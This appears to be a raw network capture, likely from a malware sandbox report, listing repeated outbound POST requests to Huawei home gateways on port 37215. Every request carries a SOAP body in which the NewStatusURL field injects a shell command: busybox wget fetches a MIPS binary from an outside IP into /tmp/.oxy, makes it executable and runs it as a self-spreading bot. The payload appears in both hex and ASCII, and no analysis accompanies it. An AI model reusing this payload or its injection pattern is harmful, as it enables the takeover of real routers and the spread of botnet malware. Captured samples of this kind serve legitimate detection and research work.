                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  933192.168.2.134822841.232.140.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.396256924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  934192.168.2.133815436.139.123.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.396392107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  935192.168.2.1342346197.99.21.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.396406889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  936192.168.2.1351184157.25.22.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.396426916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  937192.168.2.1341342157.220.209.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.396436930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  938192.168.2.1355744197.222.150.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.396451950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  939192.168.2.1336972157.73.202.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.396524906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  940192.168.2.135233041.16.94.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.396547079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  941192.168.2.136002241.188.29.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.396560907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  942192.168.2.1345246187.144.118.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.398241997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 